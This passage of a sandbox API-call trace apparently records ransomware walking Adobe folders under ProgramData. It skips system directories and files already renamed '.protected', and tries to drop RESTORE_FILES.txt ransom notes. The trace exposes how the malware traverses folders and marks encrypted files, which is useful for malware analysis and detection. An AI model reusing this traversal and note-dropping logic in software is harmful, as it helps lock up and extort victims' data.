wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat") returned 36 [0093.094] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0093.094] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0093.094] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*") returned 38 [0093.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.094] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\.") returned 38 [0093.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\..") returned 39 [0093.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.094] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0093.095] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0093.095] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0093.095] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0093.095] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0") returned 41 [0093.095] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0093.095] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0093.095] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*") returned 43 [0093.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.095] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.095] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.095] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.095] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\.") returned 43 [0093.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.095] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.095] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.095] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.095] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.095] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\..") returned 44 [0093.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="Windows") returned -1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="Program Files") returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="Program Files (x86)") returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1="Replicate", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate") returned 51 [0093.096] lstrcmpW (lpString1="Replicate", lpString2=".") returned 1 [0093.096] lstrcmpW (lpString1="Replicate", lpString2="..") returned 1 [0093.096] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*") returned 53 [0093.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.096] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.096] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.096] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.096] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\.") returned 53 [0093.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.096] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.096] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.096] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.096] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.096] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.096] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\..") returned 54 [0093.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.096] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.096] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt") returned 69 [0093.097] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.097] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.097] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="Windows") returned -1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="Program Files") returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="Program Files (x86)") returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1="Security", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 60 [0093.097] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0093.097] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0093.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*") returned 62 [0093.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.097] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.097] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.097] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\.") returned 62 [0093.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.097] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.097] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.097] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.097] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.097] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.097] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\..") returned 63 [0093.098] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.098] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="Windows") returned -1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="Program Files") returned -1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="Program Files (x86)") returned -1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="$Recycle.bin") returned 1 [0093.098] lstrcmpiW (lpString1="directories.acrodata.protected", lpString2="System Volume Information") returned -1 [0093.098] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.protected") returned 91 [0093.098] StrStrIW (lpFirst="directories.acrodata.protected", lpSrch=".protected") returned=".protected" [0093.098] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.098] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.098] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt") returned 78 [0093.098] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.098] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.098] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.098] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.098] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt") returned 78 [0093.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.098] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.098] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.098] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt") returned 69 [0093.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.099] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.099] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.099] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 59 [0093.099] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.099] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.099] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.099] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.100] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 59 [0093.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.100] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.100] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.100] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 54 [0093.100] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.100] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.100] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.100] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.100] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 54 [0093.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.101] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="Windows") returned -1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="Program Files") returned -1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="Program Files (x86)") returned -1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="$Recycle.bin") returned 1 [0093.101] lstrcmpiW (lpString1="ARM", lpString2="System Volume Information") returned -1 [0093.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM") returned 32 [0093.101] lstrcmpW (lpString1="ARM", lpString2=".") returned 1 [0093.101] lstrcmpW (lpString1="ARM", lpString2="..") returned 1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*") returned 34 [0093.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.102] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.102] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.102] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.102] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.102] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\.") returned 34 [0093.102] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.102] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.102] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.102] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.102] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.102] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.102] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\..") returned 35 [0093.102] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.102] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.102] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Windows") returned -1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files") returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files (x86)") returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="$Recycle.bin") returned 1 [0093.102] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="System Volume Information") returned -1 [0093.102] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0") returned 46 [0093.102] lstrcmpW (lpString1="Reader_10.0.0", lpString2=".") returned 1 [0093.102] lstrcmpW (lpString1="Reader_10.0.0", lpString2="..") returned 1 [0093.103] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*") returned 48 [0093.103] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.103] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.103] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.103] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.103] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.103] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.103] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\.") returned 48 [0093.103] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.103] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.103] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.103] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.103] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.103] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.103] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.103] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\..") returned 49 [0093.103] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.103] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.103] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="Program Files") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="Program Files (x86)") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.protected", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.protected") returned 79 [0093.104] StrStrIW (lpFirst="AdbeRdrSecUpd10111.msp.protected", lpSrch=".protected") returned=".protected" [0093.104] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="Program Files") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="Program Files (x86)") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.protected", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.protected") returned 80 [0093.104] StrStrIW (lpFirst="AdbeRdrUpd10110_MUI.msp.protected", lpSrch=".protected") returned=".protected" [0093.104] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="Program Files") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="Program Files (x86)") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.protected") returned 80 [0093.104] StrStrIW (lpFirst="AdbeRdrUpd10116_MUI.msp.protected", lpSrch=".protected") returned=".protected" [0093.104] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt") returned 64 [0093.104] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.104] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.104] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.104] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.104] wnsprintfW 